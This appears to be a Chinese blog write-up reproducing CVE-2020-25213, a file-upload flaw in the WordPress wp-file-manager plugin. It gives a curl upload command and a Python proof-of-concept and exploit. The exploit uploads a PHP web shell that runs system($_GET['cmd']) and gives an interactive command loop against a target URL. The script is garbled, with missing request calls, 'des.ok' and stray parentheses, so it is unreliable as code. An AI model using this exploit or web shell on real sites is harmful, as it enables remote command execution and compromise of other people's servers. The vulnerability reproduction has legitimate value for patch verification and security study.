CVE-2020-25213WordPress远程代码执⾏漏洞复现
0x01 漏洞概述
WordPress是⼀套使⽤PHP语⾔开发的博客平台,该平台⽀持在PHP和MySQL的服务器上架设个⼈博客⽹站。⽽WordPress 的⽂件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执⾏任意PHP代码。
0x02 影响版本
WordPress ⽂件管理器(wp-file-manager)插件 6.0-6.8 版本
0x03 环境搭建
phpstudy2018
WordPress
wp-file-manager 6.0版本
①将WordPress启动安装程序
安装教程参考链接:
  或者推荐百度查,这⾥不多赘述。
搭建成功后的WordPress⾸页
进⼊管理员后台安装wp-file-manager 6.0插件
  将插件安装完如下:
0x04 漏洞复现
浏览器访问
  出现下⾯到的errUnknowCmd说明漏洞存在
使⽤curl命令将本地⽂件⽤POST⽅法上传
  curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "YourIP/wordpress/wp-content/plugins/wp-file-
manager/lib/php/connector.minimal.php"
  test.php⽂件内容:
访问上传的⽂件查看
0x05 漏洞POC&EXP
# -*- coding:utf-8 -*-
import json
import requests
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "                  "Chrome/91.0.4472.124 Safari/537.36 "
}
url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"
payload = "?cmd="
"""
漏洞验证_1
检测响应中是否有errUnknownCmd
"""
def Check_1(url):
url_2 = url + url_tail
res1 = (url=url_2, headers=headers)
text1 =
text2 = json.loads(text1)
key = json.dumps(text2)  # 将json转换为字符串
print(text2)
key1 = "errUnknownCmd"
if key1 in key:
print("疑似漏洞存在")
Next = input("是否进⼀步验证 Y or N :")
if Next == "Y":
Check_2(url)
else:
print("漏洞不存在")
"""
漏洞验证_2
访问上传的php⽂件是否有正确响应
这⾥上传的php⽂件内容:<?php phpinfo() ?>
"""
def Check_2(url):
data = {
'cmd': 'upload',
'target': 'l1_',
}
files = {
'upload[0]': open('phpinfo.php', 'rb'),
}
url_3 = url + url_tail
res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
if res.status_code == des.ok:
# print("上传成功!")
d = res.json()
p = d.get('added', [])[0].get('url')
Finally_url = f'{url}{p}'
res2 = (url=Finally_url, headers=headers)
key2 = "PHP Version"
if key2 :
print("CVE-2020-25213漏洞存在! ")
flag = input("是否进⾏漏洞利⽤ Y or N :")
if flag == "Y":
while 1:
command = input("输⼊执⾏的命令: ")
if command == "exit":
break
exploit(url, command)
else:
print("漏洞不存在!")
"""
漏洞利⽤
上传php⽂件并调⽤命令执⾏
exploit.php内容:<?php system($_GET['cmd']); ?>
"""
wordpress安装首页def exploit(url, command):
data = {
'cmd': 'upload',
'target': 'l1_',
}
files = {
'upload[0]': open('exploit.php', 'rb'),
}
url_2 = url + url_tail
file_status = url + upfiles_path + "/exploit.php"
res = (url=file_status, headers=headers, verify=False)
if res.status_code == des.ok:
Fin_url = file_status + payload + command
res3 = (url=Fin_url, headers=headers)
)
else:
res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False)        if res2.status_code == des.ok:
# print("上传成功!")
d = res2.json()
p = d.get('added', [])[0].get('url')
url_3 = f'{url}{p}'
Fin_url = url_3 + payload + command
res2 = (url=Fin_url, headers=headers)
)
def main():
url = input("输⼊测试的URL:")
Check_1(url)
if __name__ == '__main__':
main()
刚开始学习写POC与EXP,有哪⾥有问题的欢迎⼤佬们指出_(:з」∠)_
0x06 修复建议
更新wp-file-manager插件⾄6.9或更⾼版本

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。